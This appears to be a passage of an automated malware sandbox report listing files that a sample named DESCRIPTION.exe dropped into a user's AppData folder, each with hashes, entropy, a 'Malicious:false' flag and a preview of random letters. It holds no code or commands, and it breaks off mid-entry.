                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.695802310443885
                                                              Encrypted:false
                                                              SSDEEP:12:RIu4UGuzIoVVNwjqNIR207iARU7f4P3V6IbPqAQo+I9KJD2xtBserph/hGVWRT9G:RIu4RwIo9TNINzi4DjQlAKBMh/hsWVQ
                                                              MD5:9F9A359B3A796ACAE37DF98CBF5D31A3
                                                              SHA1:E053A14711EF7E7923B5A95937744AC93447BF70
                                                              SHA-256:6A67C326DE4763DFA67E3FA1311AE9B86C5ABDCDAC746C2A8F3DD0EFFCC23A43
                                                              SHA-512:6769F817A697C692541CF764767EFCED29FA41725847F2FF448F4FD8F68DF85FEBBDD08311812EC718C66DBFC39C2E045F6FA9E3418F043E7BBA6CB36805A3F0
                                                              Malicious:false
                                                              Preview:BWETZDQDIBBEPKMEDOQRLAJJXRDBLDFBEZGYOGKFUISXRMIUGAQRDCJJEFDABYZYMKCZEFOJOYPVVYPFXAGPARMQITJGBTEIDPVIJBDEQLSYSAOAGWWXSQPINXVZNICUOGZVHFOVPWWAVWYRKSUOMUYXXJBNRHSWOYETLELECTWAQFDPDIRHMCIKNAEITRDMHQTBERRSBDAUXLATAJBGSTOEKDCPMFHUYOUZNOGXNFTDUPKXJMKIKGFSROJUBEFTTEVZREOFNJYSNQRXAOCQRTZMAWJSRSIPNWRIAEGNPYVLSLIIPJSZDERJOBZOXMTBKYNPHDRADKAPUFNZFAZLAAQLHHEELXVSGQIQCQQKCKLFLQROLEJZMVUVUNOVPOXEDZDFJCQRFCLLXSTRJYAFFYQCUVNCGKNUOZLEJVVYZKGTMWPHGQCDDWUZCRICRCAWCCSULPKOJHKDAALMNVXJFJSEWZTEBNFJJRSSKHADTKEVHDEVHISPEAOYYRCQBCBDQDZPPKRUKUMACZXZOHGITMKUFLEYTFZJMPDFWWOWBAGKXFSFXZSQUHXXSALOPVLOBWRPFBUCAEDAMDLZWOWOIRHKGVVRHMXLBGYDUPYNCXMJOFADRVMAWAQNDVBPJGZQQASDCCQHIXGZEQJPTKGQVYKDTHZMKOXXTLDRZWRSYCORXPJTEBDTDWEOKDABJHENMJBOVONPBHUWFUWKKFZSMFYJWSBWYPLPTCIMOAJGMMPZTANXQHPGAVCMUTSEWICDLMLMQZVYYOZTXBDFVGDEQWVLICXXRGZLURFSOTHMYBJETKLFABSFGBTCWHWOQFREMXMDHZBIBNOCEQSDVFVHIYCSSHMLTNWXTPTIBUAUVTAMEOOETGZFHOYCMPKIHBEGCVEAYMVHQPTRHVLDTMRYSLNISEZDXWUXKRXZHOCDZOGNXKRZOEZVUJEMDKMJMIMPRBOSENEVXTPOQSSVJWOHIJSOTCNEGSSEPDHNSBLO

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BWETZDQDIB.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.695802310443885
                                                              Encrypted:false
                                                              SSDEEP:12:RIu4UGuzIoVVNwjqNIR207iARU7f4P3V6IbPqAQo+I9KJD2xtBserph/hGVWRT9G:RIu4RwIo9TNINzi4DjQlAKBMh/hsWVQ
                                                              MD5:9F9A359B3A796ACAE37DF98CBF5D31A3
                                                              SHA1:E053A14711EF7E7923B5A95937744AC93447BF70
                                                              SHA-256:6A67C326DE4763DFA67E3FA1311AE9B86C5ABDCDAC746C2A8F3DD0EFFCC23A43
                                                              SHA-512:6769F817A697C692541CF764767EFCED29FA41725847F2FF448F4FD8F68DF85FEBBDD08311812EC718C66DBFC39C2E045F6FA9E3418F043E7BBA6CB36805A3F0
                                                              Malicious:false
                                                              Preview:BWETZDQDIBBEPKMEDOQRLAJJXRDBLDFBEZGYOGKFUISXRMIUGAQRDCJJEFDABYZYMKCZEFOJOYPVVYPFXAGPARMQITJGBTEIDPVIJBDEQLSYSAOAGWWXSQPINXVZNICUOGZVHFOVPWWAVWYRKSUOMUYXXJBNRHSWOYETLELECTWAQFDPDIRHMCIKNAEITRDMHQTBERRSBDAUXLATAJBGSTOEKDCPMFHUYOUZNOGXNFTDUPKXJMKIKGFSROJUBEFTTEVZREOFNJYSNQRXAOCQRTZMAWJSRSIPNWRIAEGNPYVLSLIIPJSZDERJOBZOXMTBKYNPHDRADKAPUFNZFAZLAAQLHHEELXVSGQIQCQQKCKLFLQROLEJZMVUVUNOVPOXEDZDFJCQRFCLLXSTRJYAFFYQCUVNCGKNUOZLEJVVYZKGTMWPHGQCDDWUZCRICRCAWCCSULPKOJHKDAALMNVXJFJSEWZTEBNFJJRSSKHADTKEVHDEVHISPEAOYYRCQBCBDQDZPPKRUKUMACZXZOHGITMKUFLEYTFZJMPDFWWOWBAGKXFSFXZSQUHXXSALOPVLOBWRPFBUCAEDAMDLZWOWOIRHKGVVRHMXLBGYDUPYNCXMJOFADRVMAWAQNDVBPJGZQQASDCCQHIXGZEQJPTKGQVYKDTHZMKOXXTLDRZWRSYCORXPJTEBDTDWEOKDABJHENMJBOVONPBHUWFUWKKFZSMFYJWSBWYPLPTCIMOAJGMMPZTANXQHPGAVCMUTSEWICDLMLMQZVYYOZTXBDFVGDEQWVLICXXRGZLURFSOTHMYBJETKLFABSFGBTCWHWOQFREMXMDHZBIBNOCEQSDVFVHIYCSSHMLTNWXTPTIBUAUVTAMEOOETGZFHOYCMPKIHBEGCVEAYMVHQPTRHVLDTMRYSLNISEZDXWUXKRXZHOCDZOGNXKRZOEZVUJEMDKMJMIMPRBOSENEVXTPOQSSVJWOHIJSOTCNEGSSEPDHNSBLO

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.696178193607948
                                                              Encrypted:false
                                                              SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                              MD5:960ECA5919CC00E1B4542A6E039F413E
                                                              SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                              SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                              SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                              Malicious:false
                                                              Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.701188456968639
                                                              Encrypted:false
                                                              SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                              MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                              SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                              SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                              SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                              Malicious:false
                                                              Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GAOBCVIQIJ.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.701188456968639
                                                              Encrypted:false
                                                              SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                              MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                              SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                              SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                              SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                              Malicious:false
                                                              Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\IQXRGUNTFT.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.699897908384099
                                                              Encrypted:false
                                                              SSDEEP:24:ECdI8gpNPLiozCLOjtTJ4jnVg8ntNNecesYOTZzx:E31NGLOYV9AsYkZF
                                                              MD5:08DCF778A42B9789C1F7A598730938A7
                                                              SHA1:C4A7FA17435A6E62E1A052752942FC5566B50E83
                                                              SHA-256:9DC16CAFE8C5B425403DE1A5E6979C17351C739E59531FD29059ADE6A5CF90D0
                                                              SHA-512:5CB0F7090D8AF503519495BCB1C189873ED604A6F2D3632E73306F4147270FF921C8EF91CE3D129D9CF126DDBF4AF6E7FA268F0DA513BDAF7945EA1902D59C87
                                                              Malicious:false
                                                              Preview:IQXRGUNTFTWAHQHJHFKCQPWRUCXLQZXHSROLXRVNTCVJNZDIYGGOWYWFOTIBUZEEREDTLQRZDETOMLGKNZPMLMUOGXGTDGVIKXWVEMYRBYCJAEPGECCIKMBHFRCGHOQTTCGMIDPEUDMBTKIEPNVSFLATMXSNXZNXJFBGJVURYWYNIPJUHBSXTTGUJVRJERMYXYQRJANYLUABUYMTJZHQKIZGHOHBEUIUJJDRDGDGEULTGWQUQCMMEXHWOZUSGSFAWTNRTOKHPLPSLWTTIOISILQXSFQXQNKAMYUZOCOQIUBLKSBZDEXRYNETASUEMTDXGRMWDEYDBVUWTTTLAPVRCMVOMTAAKDVWDQPBZVQCTOYPIXQBCQQMJTCLRELXTJXRBTOPDZKDLQOJTFDTUQPFIQZXIECJYNYJJZMHESXCNVTHOFTLHYSCNZOWUTNJLGBTBUKYVBYZQUCZQDVITCRZAYNIYGPNIJDMYEYWUKFOFOKMCKFENSRMKHNEMSNZAPSQOZXHLCNQSDWUSZSAPTGZWKCEIAZSJJVYAHDRFKCRNDSECRHRZNZSMWREVNKRIHEAFYESLNZYAQGCFFMQOBKWIAINETYEBKBZVDNEMDOWGCIZSLMJUUURVMRPVQSRGVCVXIVTSTAOIFGLGPBVMFRDMEFDUBLVRRZIYTFPUMSFSTOOODVSQAPPLMKLWGHDUIIYONTIVIRWCJKKINDPLLZUKUQDXXPCXQKLOSDEICMJCDIHIHGIBFUJVOFMTTGWULRYLLSUHOBQETZSOLCJOFCFXLQDLOTYLKIZIHSXUQBBTFSAQHSWRUNDUEFQWLLLBFCXHYDOVPMNJFCPQIVCRSORNPWLGZIWZBMDMXFKLVHOINAPGXSOEJOZVODVAULIUNTRPOXCHKXZGVKLECXSDLIANWIVPQLAMPHZZXKAMMXCKNYBUHYYKSWDURQWGZDYHBBHIHXKNFTYOKGCGAJJFPUUDWCDIVTSVVHNZPCFIJNV

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.702247102869977
                                                              Encrypted:false
                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                              Malicious:false
                                                              Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QCFWYSKMHA.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.702247102869977
                                                              Encrypted:false
                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                              Malicious:false
                                                              Preview:QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QLSSZNHVJI.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.696310704606104
                                                              Encrypted:false
                                                              SSDEEP:24:zUNjStS/jdkQzGpfenOSfXauumNY88ePld4qDJvq1iWWa1Jmqg:zptmzGpMOuXauuYY8tXJy1imKD
                                                              MD5:F4264A653604CF8A5BF393AA7BE6E818
                                                              SHA1:A909364A47943633E37B079FB8F7E71143294011
                                                              SHA-256:3D1CC7FE93C905BE207058E112EADA74EB472BCBE5BF855C5F85651DB4E062EE
                                                              SHA-512:D848F28195EBA8AFEBD7ECFB40BE28AFC0E36032D4183C7A7B2E2049D4BB8BE9B62F8D2497EEE308C24BD8BADADA4F524A6D983247B9CFAA16748C97C2C14F25
                                                              Malicious:false
                                                              Preview:QLSSZNHVJIHCDQLMRKBXQDWOBXUVPLESPCUCVSCRFOVLDODMQXNGMEFKHFPHVHAOVOIVUIFZVNBWJCTZFIKECOMAUAEHHTEZDGRQALOSBANKHRDVNZPHAAHUQWNUYTWJKGRHARVPVUVDXBMACOJJKPKBNBGMYDBQWTXLISDXNTKSUJBRCJUFPPAQZYNYMXRZMEYOUQZUAVPUDHUPHGSSNJKMXPRBBHPOEHFNXBMITHLTDNZFYBNUWBSLDELKLRMZRCDXSSKDYDDDTBFIVPGKZJFNGVMTCBWUOJFNBJEASELEZCDVWNXWFZMDSUHAQKWOPMGUNWPSDRMJWMZCKYOJAFEHCKVLEIDNNXGKDQMOPOBRPUNGAMRYNOPAOCULLLMDQXIHJYFOQVYDFCOIHRCBAMXPPKUKMUZYVZWZKFPVPCAQHMMKKTOHFRYIAEAQESEIXOAVHADWVKIITTCFFUOSBVOQZKRGFENXOGCIBLHQYAXGEAQVZPZEIFPJJNVWBFOQNFNLNEGUTOIQZNYAKGHFOOQQOQMKOUBLXVOIEQPAUBMYLNOSLBKKSFNXMTZOZVRDCBAPOSAPIIQJMBTMQUFDWFWHZARXHUCHNXTLZACLUEPFAKHNUZUHNZGQPKKELXYYCNJINQNDFUMDDSWMHIMWQGZUATLFURCGCGNCMERRTICTJCWZQXLWZKHXNIIAUVQJGRYIRIUOQLHQBHJQVUUOOFMVPVNJNMBJUNDHYBCGSJVHUXJYZZQOCIVWQWRZPWIKJVXKYTSZTAYGPSARSBDEEEBUKOLWIKEOAOBOCAHDJYCBUTZHJJWHMDTEPJQDIXYYUABISZJEETHPUIFXMHGOYJPIHVFICTQJQUAGXZCWMVHNJMDNMLHWYJVWLEAHAWMLTGOCDTUECIHEQZXBLOQVNRPIQRHWYMKNKDVSJNNCSNJAMNTUBTHFJROUWUWPMTKCYIWEPLHGIJFDQTMJOVBFVTKEQRNDTRGKGYJLMAVM

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.docx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.6980379859154695
                                                              Encrypted:false
                                                              SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                              MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                              SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                              SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                              SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                              Malicious:false
                                                              Preview:QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QNCYCDFIJJ.pdf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
